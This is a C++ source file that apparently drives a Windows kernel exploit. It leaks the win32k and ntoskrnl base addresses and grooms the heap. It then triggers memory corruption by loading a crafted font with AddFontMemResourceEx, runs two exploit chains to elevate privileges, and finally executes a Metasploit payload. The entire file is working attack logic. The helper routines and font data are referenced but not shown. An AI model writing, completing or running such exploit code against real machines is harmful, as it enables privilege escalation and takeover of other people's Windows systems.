// Exploit.cpp : Defines the entry point for the console application.
//
#include <Windows.h>

#include "Exploit.h"
#include "Win32kLeaker.h"
#include "Exploiter.h"
#include "FontData.h"

static VOID ExecutePayload(LPVOID lpPayload) 
{
	VOID(*lpCode)() = (VOID(*)())lpPayload;
	lpCode();
	return;
}

VOID Exploit(LPVOID lpPayload)
{
	// Variables.
	DWORD cFonts;
	PVOID pFontData = (PVOID)fontData;
	DWORD ExAllocatePoolWithTag_offset;
	ULONGLONG win32kBaseAddr;
	ULONGLONG ntBaseAddr;

	ExploiterInit();

	// Leak the win32k base address.
	win32kBaseAddr = LeakWin32kAddress();
	if (win32kBaseAddr == NULL) {
		return;
	}

	ExploiterSetupFirstChain(win32kBaseAddr);
	ExploiterDoFengShui();

	// Trigger the memory corruption: Render the font and cause memory overwrite.
	cFonts = 0;
	HANDLE fh = AddFontMemResourceEx(pFontData, sizeof(fontData), 0, &cFonts);
	// Clean up: remove the font from memory.
	RemoveFontMemResourceEx(fh);

	// First Stage: Leak ntoskrnl
	ExploiterRunFirstChain();
	ntBaseAddr = ExploiterGetNtBase();

	// Second Stage: elevate privileges
	ExploiterSetupSecondChain(win32kBaseAddr, ntBaseAddr);
	ExploiterRunSecondChain();
	ExpoiterCleanUp();

	// Exetue msf payload
	ExecutePayload(lpPayload);
}

